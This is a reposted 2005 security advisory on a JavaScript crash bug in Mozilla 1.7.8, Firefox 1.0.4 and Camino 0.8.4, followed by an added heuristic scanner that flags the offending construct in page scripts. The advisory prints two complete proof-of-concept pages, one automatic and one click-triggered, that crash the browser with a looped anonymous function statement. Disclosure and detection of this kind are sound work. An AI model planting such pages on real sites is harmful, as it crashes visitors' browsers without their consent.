
[Repost] JavaScript security flaw in multiple Mozilla products

Author: Paul Kurczaba

Vendor:
Mozilla (http://www.mozilla.org)

Vulnerable Software:
Mozilla 1.7.8
Firefox 1.0.4
Camino 0.8.4

Vulnerability/Exploit:
By using a specially crafted JavaScript function, it is possible to
crash the above named browsers. The script can be executed both with and
without user intervention.

Proof of Concept:
Manual: http://www.kurczaba.com/html/security/0506241_poc.htm
Code:
<!--
    Mozilla Multiple Product JavaScript Issue: Proof-of-Concept 2
    Discovered by Paul Kurczaba
-->
<html>
<head>
<title>Mozilla Multiple Product JavaScript Issue: Proof-of-Concept 2</title>
</head>

<body>

<form name="Form1" action="javascript:CrashFirefox();">

    <fieldset style="border: 2px solid #808080; padding: 2px">
    <legend>
    <span style="font-weight: 700">

    <font face="Trebuchet MS" size="2" color="#333333">Mozilla Multiple Product JavaScript Issue: Proof-of-Concept
    2 - Automatic</font></span></legend>
    <table border="0" width="100%" cellspacing="0" cellpadding="0" id="table1">
        <tr>
            <td width="6"> </td>
            <td><font face="Trebuchet MS" size="2" color="#333333">This
            Proof-of-concept code will
            crash the following Mozilla products:<br>
              -Mozilla 1.7.8<br>
              -Firefox 1.0.4<br>
              -Camino 0.8.4<br>
            <br>
            Your browser (if a Mozilla Product) will crash in
            <input type="text" name="textcountdown" size="1" style="border: 0px solid #FFFFFF; font-family:Trebuchet MS; font-size:10pt; color:#333333; vertical-align:text-bottom">seconds.<br>
</font></td>
        </tr>

    </table>
    </fieldset>
</form>

<script language="JavaScript">

var second = 6
document.Form1.textcountdown.value = 6

function countdown()
{
    if (second > 1){
        second = second -1
        document.Form1.textcountdown.value=second
    }
    else
    {
        //Run the function 20000 times
        for (a = 0; a <= 20000; a++)
        {
            //Here is the special code that terminates the browser
            function(){};
        }
        
        //Displays an alert to notify the user if the browser is not vulnerable.
        alert("Good news - Your browser is not vulnerable.");

        return
    }
    setTimeout("countdown()",1000)
}

countdown()
</script>

</body>

</html>
Automatic: http://www.kurczaba.com/html/security/0506241_poc2.htm
Code:
<!--
    Mozilla Multiple Product JavaScript Issue: Proof-of-Concept
    Discovered by Paul Kurczaba
-->
<html>
<head>
<title>Mozilla Multiple Product JavaScript Issue: Proof-of-Concept</title>
</head>

<body>

<form name="Form1" action="javascript:CrashFirefox();">

    <fieldset style="border: 2px solid #808080; padding: 2px">
    <legend>
    <span style="font-weight: 700">

    <font face="Trebuchet MS" size="2" color="#333333">Mozilla Multiple Product JavaScript
    Issue: Proof-of-Concept 1 - Manual</font></span></legend>
    <table border="0" width="100%" cellspacing="0" cellpadding="0" id="table1">
        <tr>
            <td width="6"> </td>
            <td><font face="Trebuchet MS" size="2" color="#333333">This
            Proof-of-concept code will
            crash the following Mozilla products:<br>
              -Mozilla 1.7.8<br>
              -Firefox 1.0.4<br>
              -Camino 0.8.4<br>
            <br>
            To execute the Proof-of-concept code, click on the button.<br>
            <br>
            <input type="submit" value="  Go  " name="ButtonStart" style="font-family: Trebuchet MS; font-size: 10pt; color: #333333; text-decoration:none"><br>
             </font></td>
        </tr>

    </table>
    </fieldset>
</form>

<script language="JavaScript">
   
    //Our function that is called from clicking the button
    function CrashFirefox()
    {
        //Run the function 20000 times
        for (a = 0; a <= 20000; a++)
        {
            //Here is the special code that terminates the browser
            function(){};
        }
        
        //Displays an alert to notify the user if the browser is not vulnerable.
        alert("Good news - Your browser is not vulnerable.");
    }

</script>

</body>

</html>
Workaround:
Disable JavaScript

Date Discovered:
June 14, 2005

Severity:
Low

Credit:
Paul Kurczaba
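Both proofs of concept above rely on the same construct: an anonymous `function(){}` written as a statement and repeated inside a loop. The following is an added example, not part of the original advisory or the author's code: a heuristic scan that a filtering proxy or page audit could use to flag that construct in inline scripts. The names `stripNoise`, `findAnonFunctionStatements`, `scanPage` and the sample page are constructed for illustration, and the scan is a text heuristic rather than a full JavaScript parser.

```javascript
// Added example, not from the advisory: a heuristic text scan (not a JS parser)
// for an anonymous function written as a statement. Names/samples are constructed.
// Blank out comments and string literals, keeping length and newlines.
function stripNoise(js) {
  const re = /\/\*[\s\S]*?\*\/|\/\/[^\n]*|"(?:\\.|[^"\\\n])*"|'(?:\\.|[^'\\\n])*'/g;
  return js.replace(re, (m) => m.replace(/[^\n]/g, " "));
}

function findAnonFunctionStatements(js) {
  const src = stripNoise(js);
  const anon = /function\s*\(/y; // sticky: matches only at lastIndex
  const blocks = [];             // one entry per open "{"
  const findings = [];
  let depth = 0;                 // "(" nesting within the current block
  let start = 0;                 // index where the current statement began
  for (let i = 0; i < src.length; i++) {
    const c = src[i];
    if (c === "(") depth++;
    else if (c === ")") depth--;
    else if (c === ";" && depth === 0) start = i + 1;
    else if (c === "{") {
      // The block is a loop body when its statement opens with for/while/do.
      const loop = /^(for|while|do)\b/.test(src.slice(start, i).trim());
      blocks.push({ loop, depth });
      depth = 0;
      start = i + 1;
    } else if (c === "}") {
      const closed = blocks.pop();
      depth = closed ? closed.depth : 0;
      start = i + 1;
    } else if (c === "f" && src.slice(start, i).trim() === "") {
      anon.lastIndex = i;
      if (anon.test(src)) {
        const line = src.slice(0, i).split("\n").length; // 1-based, in this script
        findings.push({ line, inLoop: blocks.some((b) => b.loop) });
      }
    }
  }
  return findings;
}

// Scan every inline <script> body of a page.
function scanPage(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  return Array.from(html.matchAll(re), (m) => m[1]).flatMap(findAnonFunctionStatements);
}
// Constructed sample: a small loop with the construct, plus a benign expression.
const samplePage = "<script>\nvar ok = function(){};\n" +
  "for (i = 0; i < 3; i++)\n{\n    function(){};\n}\n</script>";
console.log(scanPage(samplePage)); // [ { line: 5, inLoop: true } ]
```

Function expressions in expression position (assignments, call arguments, immediately invoked functions) are not reported, and a loop written without braces is not recognised as a loop body.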